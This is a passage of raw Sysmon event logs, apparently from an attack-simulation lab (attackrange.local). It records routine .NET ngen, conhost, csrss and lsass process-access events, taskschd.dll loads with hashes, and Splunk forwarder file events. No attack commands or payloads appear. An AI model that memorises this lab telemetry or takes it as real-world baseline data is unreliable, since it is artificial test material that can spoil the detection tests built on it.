14:57:22.155{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD2-607E-380C-00000000BB01}6016c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073988Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.155{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD2-607E-380C-00000000BB01}6016c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073987Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.155{A7A01FEF-EBD2-607E-380C-00000000BB01}6016C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000073986Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.140{A7A01FEF-EBD2-607E-390C-00000000BB01}48204600C:\Windows\system32\conhost.exe{A7A01FEF-EBD2-607E-380C-00000000BB01}6016c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073985Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.124{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBD2-607E-390C-00000000BB01}4820C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073984Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.124{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD2-607E-380C-00000000BB01}6016c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073983Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.124{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD2-607E-380C-00000000BB01}6016c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073982Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.108{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD2-607E-360C-00000000BB01}4944c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073981Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.108{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD2-607E-360C-00000000BB01}4944c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073980Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.108{A7A01FEF-EBD2-607E-360C-00000000BB01}4944C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000073979Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.093{A7A01FEF-EBD2-607E-370C-00000000BB01}67485168C:\Windows\system32\conhost.exe{A7A01FEF-EBD2-607E-360C-00000000BB01}4944c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073978Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.093{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD2-607E-370C-00000000BB01}6748C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073977Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.077{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBD2-607E-360C-00000000BB01}4944c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073976Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.077{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD2-607E-360C-00000000BB01}4944c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073975Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.061{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD2-607E-340C-00000000BB01}6784c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073974Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.061{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD2-607E-340C-00000000BB01}6784c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073973Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.061{A7A01FEF-EBD2-607E-340C-00000000BB01}6784C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000073972Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.046{A7A01FEF-EBD2-607E-350C-00000000BB01}45487140C:\Windows\system32\conhost.exe{A7A01FEF-EBD2-607E-340C-00000000BB01}6784c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073971Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.046{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD2-607E-350C-00000000BB01}4548C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073970Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.046{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD2-607E-340C-00000000BB01}6784c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073969Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.046{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD2-607E-340C-00000000BB01}6784c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073968Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.030{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD2-607E-320C-00000000BB01}3212c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073967Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.030{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD2-607E-320C-00000000BB01}3212c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073966Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.030{A7A01FEF-EBD2-607E-320C-00000000BB01}3212C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000073965Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.015{A7A01FEF-EBD2-607E-330C-00000000BB01}48286788C:\Windows\system32\conhost.exe{A7A01FEF-EBD2-607E-320C-00000000BB01}3212c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073964Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.999{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD2-607E-330C-00000000BB01}4828C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073963Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.999{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBD2-607E-320C-00000000BB01}3212c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073962Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.999{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD2-607E-320C-00000000BB01}3212c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000050256Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:22.953{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12E62A13D8E9F99613F5406B83235146,SHA256=A491DFF023DB79F8EFB85A6B8534FEB7EEB57ACDC99C29631AEA0A3E3F9FC4C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050255Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:22.859{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=72182AB366B84955C00EEDCB9DE2232D,SHA256=65D6A48CC0F027548082E536326D462383FE3A3E8FEDEF2CAD922432E25AD10E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000074297Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.983{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD3-607E-900C-00000000BB01}944c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074296Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:23.983{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD3-607E-900C-00000000BB01}944c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074295Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 